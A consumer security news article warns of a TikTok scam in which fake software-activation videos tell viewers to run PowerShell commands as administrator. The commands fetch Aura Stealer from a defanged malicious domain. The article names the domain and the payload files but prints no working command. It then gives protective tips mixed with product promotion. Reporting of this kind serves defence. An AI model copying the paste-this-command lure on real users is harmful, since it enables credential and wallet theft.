TikTok malware scam uses fake software activation guides to steal data
NEWYou can now listen to Fox News articles!
Cybercriminals are again turning TikTok into a trap for unsuspecting users. This time, they disguised malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.
Security expert Xavier Mertens first spotted the campaign and confirmed that the same type of scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and instruct viewers to run them as administrator to “activate” or “fix” their programs.
In reality, these commands connect to a malicious website and introduce malware known as Aura Stealer, which silently extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.
Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent safety alerts and special deals straight to your inbox. You’ll also get instant access to my Ultimate Scam Survival Guide — free when you join me CYBERGUY.COM bulletin.
OVER 3,000 YOUTUBE VIDEOS PROVIDE MALWARE POSTED AS FREEWARE
Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as a free activation guide. (Kurt “CyberGuy” Knutsson)
How do TikTok scams work?
This campaign uses what experts call the ClickFix attack. This is a social engineering trick that makes victims feel like they are following legitimate technical instructions. The instructions seem quick and simple: run a short command and get instant access to the premium software.
But instead of activating anything, the PowerShell command connects to a remote domain called slmgr.[.]win, which downloads malicious executables from pages hosted by Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once in the system, it searches for your credentials and sends them back to the attacker.
Another file, source.exe, uses Microsoft’s C# compiler to initialize code directly in memory, making the code even harder to detect. The purpose of this extra payload is not yet fully known, but the pattern follows previous malware used for crypto theft and ransomware distribution.
META ACCOUNT SUSPENSION SCAM HIDES FILEFIX MALWARE
These short “activation” commands secretly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)
How to protect yourself from TikTok malware scams?
Even though these scams seem convincing, you can avoid being a victim with the right precautions.
1) Avoid shortcuts
Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a trap.
2) Use reliable sources
Always download or activate software directly from the official website or legal app stores.
3) Keep security tools up to date
Outdated antivirus or browsers cannot detect the latest threats. Update your software regularly to stay protected.
4) Use strong antivirus software
Install powerful antivirus software that offers real-time scanning and protection against Trojans, skimmers, and phishing attempts.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have strong antivirus software installed on all your devices. This protection also keeps your personal information and digital assets safe by alerting you to phishing emails and ransomware scams.
Get my picks for the 2025 best antivirus protection winners for your Windows, Mac, Android, and iOS devices at: cyberguy.com
5) Sign up for data removal service
If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help remove sensitive information.
While no service can guarantee complete removal of your data from the internet, a data removal service is truly a smart choice. They’re not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to delete your personal data from the internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data obtained from breaches with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and run a free scan to see if your personal information is already on the internet by visiting: cyberguy.com
Take advantage of free scanning to find out if your personal information is already on the internet: cyberguy.com
6) Reset credentials
If you followed questionable instructions or entered your credentials after watching a “free activation” video, reset all your passwords immediately.
7) Reset passwords
If you followed questionable instructions or entered your credentials after watching a “free activation” video, reset all your passwords immediately. Start with your email, financial and social media accounts. Use unique passwords for each site. Consider using a password manager that securely stores and generates complex passwords, reducing the risk of password reuse.
Next, see if your email has been subject to past breaches. Our #1 password manager (see cyberguy.com) pick includes a built-in breach scanner that checks to see if your email address or passwords appear in known leaks. If you find a match, immediately replace reused passwords and secure those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at: cyberguy.com
8) Enable multi-factor authentication
Add an extra layer of security by enabling multi-factor authentication Wherever possible. Even if your passwords are stolen, attackers will not be able to log in without your verification.
If you followed questionable steps, change your passwords, enable two-factor authentication, and be alert for future scams. (Getty Images)
Kurt’s important takeaways
TikTok’s global reach makes it a prime target for such scams. What seems like a useful hack could cost you your security, money, and peace of mind. Be careful, trust only verified sources, and remember that there is no such thing as a free activation shortcut.
CLICK TO DOWNLOAD FOX NEWS APPLICATION
Is TikTok doing enough to protect its users from scams like these? Let us know by writing to us. cyberguy.com
Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent safety alerts and special deals straight to your inbox. You’ll also get instant access to my Ultimate Scam Survival Guide — free when you join me CYBERGUY.COM bulletin.
Copyright 2025 CyberGuy.com. All rights reserved.
